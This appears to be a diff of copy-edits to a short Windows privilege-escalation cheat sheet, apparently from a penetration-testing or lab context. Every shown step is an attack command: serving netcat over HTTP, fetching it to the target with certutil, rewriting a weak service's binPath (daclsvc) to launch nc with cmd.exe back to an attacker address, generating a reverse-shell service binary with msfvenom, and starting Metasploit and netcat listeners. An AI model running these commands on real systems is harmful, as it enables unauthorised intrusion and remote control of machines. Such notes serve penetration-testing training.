 Skip to content

-1. Host the nc binary Using Python:
+1. Host the nc binary using Python:

 python3 -m http.server 8000

-certutil -urlcache -f http://[IP-ADRESS]:8000/nc64.exe nc64.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/nc64.exe nc64.exe

-3. To exploit a service, place nc.exe in the C:\temp folder and modify the service binpath with this command:
+3. To exploit the service, place nc.exe in C:\Temp and modify the service binary path:

-sc config daclsvc binPath= "C:\temp\nc64.exe [IP-ADRESS] 443 -e C:\windows\system32\cmd.exe"
+sc config daclsvc binPath= "C:\Temp\nc64.exe [IP-ADDRESS] 443 -e C:\Windows\System32\cmd.exe"

 sc start daclsvc

-msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADRESS] LPORT=[PORT] -f exe-service -o reverse.exe
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT] -f exe-service -o reverse.exe

-NOTE: After creating the reverse shell payload, transfer it to the target machine.
+Note: After creating the reverse shell payload, transfer it to the target machine.

 msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

-3. Alternatively, we can start a listener using nc:
+3. Alternatively, start a listener with Netcat:

 sudo rlwrap -cAr nc -lvnp 1338